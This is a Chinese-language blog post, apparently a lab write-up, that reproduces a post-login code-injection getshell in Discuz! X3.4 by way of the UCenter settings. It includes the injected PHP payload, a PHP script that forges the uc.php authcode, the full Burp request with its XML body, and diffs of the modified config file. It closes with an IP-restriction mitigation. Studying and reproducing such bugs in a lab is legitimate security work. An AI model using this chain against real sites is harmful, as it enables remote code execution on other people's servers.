https://www.svenbeast.com/post/discuzx34-hou-tai-xiu-gai-uc_center-pei-zhi-getshell/ Discuz!x3.4 后台修改UCenter配置getshell
靶場搭建
寶塔 + php 5.6 + mysql 5.7
https://github.com/sv3nbeast/discuz-x3.4-RCE Discuz-x3.4-RCE
# git clone https://github.com/sv3nbeast/discuz-x3.4-RCE.git discuz.x3.4.rce.bt
# cd discuz.x3.4.rce.bt
# unzip Discuz_SC_UTF8.zip
寶塔網站目錄設為 upload/ ,訪問站點地址後按照流程安裝(略)
滲透
登錄後台 => 站點 => UCenter 設置
UCenter 通信密钥: 123456
UCenter 访问地址: http://discuz.x3.4.rce.bt/upload/uc_server');phpinfo();//
這步完成後會修改 upload/config/config_ucenter.php ,但是 UC_API 的'會跳脫
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | diff --git a/upload/config/config_ucenter.php b/upload/config/config_ucenter.phpindex 6df46ac..7fb0562 100644--- a/upload/config/config_ucenter.php+++ b/upload/config/config_ucenter.php@@ -12,9 +12,8 @@ define('UC_DBCONNECT', 0); define('UC_CHARSET', 'utf-8');-define('UC_KEY', 'b2w03075v067ve2d2aEdl9Aco6lbD4Z4T02dA0v2lfj0L6gdodj0l1P6QbX1l8ta');-define('UC_API', 'http://discuz.x3.4.rce.bt/uc_server');+define('UC_KEY', '123456');+define('UC_API', 'http://discuz.x3.4.rce.bt/upload/uc_server\');phpinfo();//'); define('UC_APPID', '1'); define('UC_IP', ''); define('UC_PPP', 20); |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 | $uc_key="123456";//$time = time() + 720000;$str = "time=".$time."&action=updateapps";$code = authcode($str,"ENCODE",$uc_key);$code = str_replace('+','%2b',$code);$code = str_replace('/','%2f',$code);echo $code;function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { $ckey_length = 4; $key = md5($key != '' ? $key : '123456'); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { return $keyc.str_replace('=', '', base64_encode($result)); }} |
# php code.php
1bd61yMP9oRuwAfLBlYNlBPBkzl1jkGTnpSq3vUZyXhcAdE%2b2yy4cB35w4%2fKMYnKEAfQ1mnlRsR2phjoI9k
使用burp suite,攔截帶code參數GET請求發送
GET /api/uc.php?code=1bd61yMP9oRuwAfLBlYNlBPBkzl1jkGTnpSq3vUZyXhcAdE%2b2yy4cB35w4%2fKMYnKEAfQ1mnlRsR2phjoI9k HTTP/1.1
Host: discuz.x3.4.rce.bt
Cookie: ooyE_2132_saltkey=rlpi42qL; ooyE_2132_lastvisit=1633423183; ooyE_2132_sid=iKnzwk; ooyE_2132_lastact=1633426854%09uc.php%09
Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://discuz.x3.4.rce.bt/uc_server</item>
</root>
UC_API的XML需攔截後手動加入,經過測試這個包要送2次,第二次才生效。
burp suite轉發請求後頁面返回1
會修改 upload/config/config_ucenter.php 和 upload/uc_client/data/cache/apps.php
diff --git a/upload/config/config_ucenter.php b/upload/config/config_ucenter.php
index 6df46ac..7ceb6e0 100644
--- a/upload/config/config_ucenter.php
+++ b/upload/config/config_ucenter.php
@@ -12,9 +12,8 @@
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
-define('UC_KEY', 'b2w03075v067ve2d2aEdl9Aco6lbD4Z4T02dA0v2lfj0L6gdodj0l1P6QbX1l8ta');
-define('UC_API', 'http://discuz.x3.4.rce.bt/uc_server');
+define('UC_KEY', '123456');
+define('UC_API', 'http://discuz.x3.4.rce.bt/uc_server');phpinfo();//'); // 成功取消跳脫,完成注入
define('UC_APPID', '1');
define('UC_IP', '');
define('UC_PPP', 20);
-?>
diff --git a/upload/uc_client/data/cache/apps.php b/upload/uc_client/data/cache/apps.php
index 7948d40..54e6afa 100644
--- a/upload/uc_client/data/cache/apps.php
+++ b/upload/uc_client/data/cache/apps.php
@@ -1,22 +1,3 @@
<?php
$_CACHE['apps'] = array (
- 1 =>
- array (
- 'appid' => '1',
- 'type' => 'DISCUZX',
- 'name' => 'Discuz! Board',
- 'url' => 'http://discuz.x3.4.rce.bt',
- 'ip' => '',
- 'viewprourl' => '',
- 'apifilename' => 'uc.php',
- 'charset' => '',
- 'dbcharset' => '',
- 'synlogin' => '1',
- 'recvnote' => '1',
- 'extra' => false,
- 'tagtemplates' => '',
- 'allowips' => '',
- ),
);
-
-?>
此時 http://discuz.x3.4.rce.bt/config/config_ucenter.php 就是我們的shell地址,至此getshell結束
從第一步得知這個getshell需要登錄後台修改UCenter配置,所以Discuz!x3.4的後台需要做IP訪問限制避免此漏洞利用
如果要重新復現次漏洞,# git reset --hard 後記得 upload/config/config_ucenter.php 和 upload/uc_client/data/cache/apps.php 權限要改成www可寫入,否則後台表單會有bug
沒有留言:
張貼留言